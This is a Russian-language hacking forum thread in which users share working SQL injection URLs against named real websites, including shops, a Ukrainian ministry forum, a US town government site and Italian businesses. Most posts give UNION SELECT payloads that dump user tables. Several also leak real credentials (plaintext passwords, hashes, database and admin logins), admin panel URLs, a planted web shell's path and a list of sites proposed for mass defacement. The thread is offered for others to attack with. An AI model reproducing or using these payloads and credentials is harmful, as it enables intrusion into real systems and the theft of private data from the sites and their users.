Ссылки на SQL инъекции — HackZona.Ru

Постим здесь раскрученные SQL инъекции для общего пользования, просьба не постить вопросы по инъекциям, все вопросы сюда: www.hackzona.ru/hz.php?name=Forums&file;=viewtopic&t;=30445

Ссылки на SQL инъекции

Сообщений в теме: 158
scipio
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
Постим здесь раскрученные SQL инъекции для общего пользования, просьба не постить вопросы по инъекциям, все вопросы сюда: www.hackzona.ru/hz.php?name=Forums&file;=viewtopic&t;=30445
11:11 Ответить
Diogenf
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
Вся база как на ладнони
[code]
shop.e12.cz/index.php?page=katalog&model;=287&level;=3&parent;=-135+union+select+1,2,3,4,5,6,concat_ws(0x2e,table_ schema,table_name,column_name),8,9,10,11,12+from+i nformation_schema.columns/*
[/code]
ПР5 ТИЦ 240
[code]
www.butik.ru/goods/view/gd480001'+union+select+1,2,3,4,concat(email,0x3a,p ass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+fro m+user+limit+5,1/*.html
[/code]
19:19 Ответить
fentrius
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
http://www.suncal.com/news/view.php?id=-47+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,id,user_login,user_pass)+from+alameda_point.wp_users/*
10:52 Ответить
fentrius
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
Сегодняшние свежие скули))
[code]
www.fremontonline.org/menu1.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user,password)+from+mysql.user+--+
www.videofil.net.ua/prices.php?id=-1+union+select+1,2,concat_ws(0x3a,id,login,password),4,5,6,7,8+from+users+--+
mega-soft.com.ua/view_soft.php?id=-1+union+select+1,concat_ws(0x3a,id,user,pass),3,4,5,6,7,8,9,10,11+from+userlist+--+
[/code]
11:51 Ответить
scrabbby
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
А что ничего по свежее нету? :(
14:19 Ответить
fentrius
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
[code]
www.l-oko.ru/goonline.php?id=-1%27+union+select+1,2,concat_ws(0x3a,user_id,username,user_password),4,5,6,7,8+from+phpbb_users+limit+1,1+--+
[/code]
Болельщики ФК Локомотив, простите :oops:
07:48 Ответить
fentrius
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
http://www.crossroadsdg.com/news_more.php?id=1+union+select+1,concat_ws(0x3a,id,username,password),3,4+from+users+--+
10:22 Ответить
fentrius
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
http://www.swstechnology.com/equipment_product.php?ID=-1'+union+select+1,concat_ws(0x3a,ID,Username,Password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+adminuser+--+
07:17 Ответить
fraIzer
Нравится
Не нравится
Репутация: 1
Рейтинг: 0
Кол-во тем: 0
Сообщения: 436
Скулька на Форуме Мiнiстерства освіти i науки України:
[CODE]http://www.mon.gov.ua/forum/new.php?f=0&r;=-1+union+select+1,2,3,4,5,group_concat(concat(table_name,'$$$',version(),'%%%',database(),'%3E%3E%3E',user())+separator+0x0a),7,8,9,10,11,12,13,14,15,16+from+information_schema.tables/*[/CODE]
09:56 Ответить
fentrius
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
http://www.cpod.org.au/page.php?id=-47+union+select+1,concat_ws(0x3a,id,username,password),3,4,5,6,7,8+from+user/*
09:11 Ответить
fentrius
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
[code]
www.microhydropower.net/news/viewnews.php?ID=-47+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7+from+users/*[/code]
10:00 Ответить
Kerny
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 99
Сообщения: 0
[CODE]http://htdig.honestjohn.co.uk/news/item.htm?id=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,table_name,column_name,table_schema),11+from+information_schema.columns+limit+1,1--[/CODE]

Пароли
[1]:2:stephen:planet777:081960
[2]:3:davidmace:Caval1er:693218
[3]:4:pologirl:poppy98:104999
[4]:5:nova:novajayne:081960
[5]:6:ianwelch:ianwelch51:081960
[6]:7:sarah:893825:897843
[7]:8:pugugly:MORRIS:331259
[8]:9:robjames:Sp1derP1ant:730145

Админка
[CODE]http://www.honestjohn.co.uk/admin/login/login.htm?rd=%2Fadmin[/CODE]

При входе есть одна маленькая хитрость…

Ниже там написано:

Select digit 5 from your code
Select digit 3 from your code

Если вы входите под логином stephen, и то выставляете значения так

Select digit 5 from your code 6
Select digit 3 from your code 1

Тут спец код 081960, 5 и 3 говорит о том что нужно взять 5 и 3 символы из кода, тоесть 6 и 1…
16:04 Ответить
Kerny
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 99
Сообщения: 0
Офигеть дырявый как незнамо что, шелл так и не залил может кто зальет…

[CODE]http://www.technolex-anwaelte.de/index.php?id=43&news;_id=1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--[/CODE]

[B]php-info:[/B]
[CODE]http://www.technolex-anwaelte.de/info.php[/CODE]

[B]админка[/B]
[CODE]http://www.technolex-anwaelte.de/admin/[/CODE]

[B]Скуля в админке[/B]
[CODE]http://www.technolex-anwaelte.de/admin/index_content.php?pid=33&rid;=-1+union+select+1,2,3--[/CODE]

[B]Просмотр дир[/B]
[CODE]http://www.technolex-anwaelte.de/admin/index_upload.php?dir=../[/CODE]

[B]Пароли к админке[/B]
1:technolex:technolex!
2:14v:14v

[B]Таблицы и колонки[/B]
17:34 Ответить
fraIzer
Нравится
Не нравится
Репутация: 1
Рейтинг: 0
Кол-во тем: 0
Сообщения: 436
http://zwerg-schnauzer.info/dog.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3a,user(),database(),version()),16,17,18
[B][email protected]:rustrake_mini:5.0.26-lk-log[/B][CODE]http://sarilocker.com/advice/qa.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6[/CODE][B][email protected]:sarilock_01:5.0.75-community-log[/B]
http://armor.kiev.ua/php/news.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9
[B][email protected]:armor:5.0.77[/B]
19:01 Ответить
fentrius
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
[code]
www.rfbd.ru/cat.php?cpage=4&rubrika;=-1+union+select+1,concat_ws(0x3a,id,username,password)+from+test.jos_users+--+[/code]
04:39 Ответить
agata
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
http://www.macforge.net/projects.php?cat=-1+union+select+1,concat_ws(0x3a3a3a,user(),version(),database()),3+--+

http://www.macforge.net/projects.php?cat=-1+union+select+1,concat_ws(0x3a3a3a3a,user,password),3+from+mysql.user+--+
13:51 Ответить
Reason89
Нравится
Не нравится
Репутация: 1
Рейтинг: 3
Кол-во тем: 0
Сообщения: 1501
Григорий Явлинский
Copyright ©2000-2009 Объединение «Яблоко»

[CODE]http://www.yavlinsky.ru/culture/index.phtml?id=-1747+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3A3A,user(),database(),version()),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--[/CODE]
00:27 Ответить
Kerny
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 99
Сообщения: 0
Сайты на одном сервере, большинство сайтов там подвержены уязв, т.к их делала одна и таже компания…

[B]Уязвимость№1[/B]
[CODE]http://www.minervaenettuno.it/en/minerva-e-nettuno-venezia-index.php?lang=2+union+select+1,version(),3+limit+1,1--[/CODE]

[B]Уязвимость№2[/B]
[CODE]http://ticosoci.it/ticosoci_zoom.php?target=39+union+select+1,2,3,4,5,6,7,8+limit+1,1-[/CODE]

[B]Админки[/B]
[CODE]http://www.minervaenettuno.it/admin[/CODE]
[CODE]http://ticosoci.it/admin[/CODE]

[B]Шелл[/B]
[CODE]http://www.minervaenettuno.it/file/Web-Lab/web-lab.config.php[/CODE]

[B]Пробывал получить Root:[/B]

[url]http://forum.hackzona.ru/forum-f8/root-t13947.html[/url]

Может у кого и выйдет…
18:44 Ответить
SpxnezzaR
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
[QUOTE=Kerny;90313]
[B]Шелл[/B]
[CODE]http://www.minervaenettuno.it/file/Web-Lab/web-lab.config.php[/CODE]

[B]Пробывал получить Root:[/B]

[url]http://forum.hackzona.ru/forum-f8/root-t13947.html[/url]

Может у кого и выйдет...[/QUOTE]
$db_host = «localhost»;
$db_user = «nettuno»;
$db_password = «mi01ne19»;
$db_name = «weblab_minerva»;

доступ к админке:
[url]http://www.minervaenettuno.it/admin/login/index.php[/url]
логин: minerva
пасс: net9tt45
поржал, первый раз увидел пас в БД без шифрования.

ядро патченое, рут врядли обваится, но вот шел поиметь можно будет наверное, сейчас только раскумарюсь.

возможн мультидэф на следующие сайты:
[url]http://testolini.it/[/url]
[url]http://veneziavacanze.it/[/url]
[url]http://otticaurbani.com/[/url]
[url]http://asolohouse.com/[/url]
minervaenettuno.it
rele.it
[url]http://matteosantini.com/[/url]
[url]http://timeconcept.it/[/url]
[url]http://studionotaio.com/[/url]
[url]http://pensioneseguso.com/[/url]
[url]http://ordineavvocativenezia.it/[/url]
[url]http://markusartgallery.com[/url]
[url]http://venicecorner.com[/url]

судя по полосе скрола в логе, то это только треть.
20:02 Ответить
Kerny
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 99
Сообщения: 0
[QUOTE=SpxnezzaR;90319]$db_host = «localhost»;

ядро патченое, рут врядли обваится, но вот шел поиметь можно будет наверное, сейчас только раскумарюсь.

[/QUOTE]

Так шелл, итак есть…
20:46 Ответить
SpxnezzaR
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
[QUOTE=Kerny;90323]Так шелл, итак есть...[/QUOTE]
я имел ввиду полноценный шел, а не вэб-обрезок.
23:01 Ответить
fraIzer
Нравится
Не нравится
Репутация: 1
Рейтинг: 0
Кол-во тем: 0
Сообщения: 436
[QUOTE=FIXER;107972]2JC Оба линка мертвые =\[/QUOTE]

Да? Почему тогда я вывод вижу?!
[QUOTE]_http://www.shininco.ru/upr/both/news.php?show_text=1&news;_id=-113'+union+select+1,null,concat_ws(0x2f2f2f,user(),@@version,@@version_compile_os),4,5,6,7,8,9,1+from+admin+--+[/QUOTE]
:roll:
19:43 Ответить
fentrius
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
[code]
www.sukces.co.uk/interviews.php?id=-1+union+select+1,2,concat_ws(0x3a,id,name,password)+from+user+--+
www.parcocollinemetallifere.it/comuni.php?id=-1+union+select+1,2,concat_ws(0x3a,user,passwd),4,5,6,7,8+from+archivier.utenti+--+
www.valgri.it/england/shop/details.php?id=-1+union+select+1,concat_ws(0x3a,user,password),3,4,5,6+from+admin/*
[/code]
12:54 Ответить
Kerny
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 99
Сообщения: 0
[B]Vulnerability:[/B]
[url]http://www.truro-ma.gov/php/event_details_t.php?event_id=-1513+union+select+1,concat_ws%280x3a,login,pw%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+users--[/url]

[B]Admin Panel:[/B]
[URL]http://www.truro-ma.gov/_login[/URL]

[B]
Password admin:[/B][code]
[0]:administrator:40be4e59b9a2a2b5dffb918c0e86b3d7:[email protected]:10
welcome

[1]:cpatapie:de2e05e1e4ff48c85d1f9248d001d52b:[email protected]:10
firebolt

[2]:gdelius:bf750bdce0c74463bcd7e23521a5ec38:[email protected]:10

[3]:jldupree:b3e68e540a116c33975799ba4ef210c1:[email protected]:8

[4]:caslade:5ee5bea653720c667ec2f739c9df5ef5:[email protected]:8
grinch

[5]:truro300:9a1b4a3befad8ea0720df211625eb141:[email protected]:0
[/code][URL=«imageshost.ru/links/2203d08c5aaba84cab32978ac477df83»][IMG]http://img6.imageshost.ru/imgs/090522/e24353ec45bddac2bd5e6d47d473e317/tc465c64f4d696f45de5633f415b9a396.jpg[/IMG][/URL]

Послал письмо админу, надеюсь закроет уязв
14:32 Ответить
Kerny
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 99
Сообщения: 0
[QUOTE=Symboss;91283]mojno SQL инъекции na forum.wapcel.org?[/QUOTE]

нет нельзя
17:08 Ответить
fediaa
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
Регестрируйтесь на форуме [url]http://vziomal.easyforum.ru/[/url], помогите ему развится.
14:23 Ответить
Ответить
2 3
Для того, чтобы отвечать в темах на форуме необходимо войти на сайт или зарегистрироваться.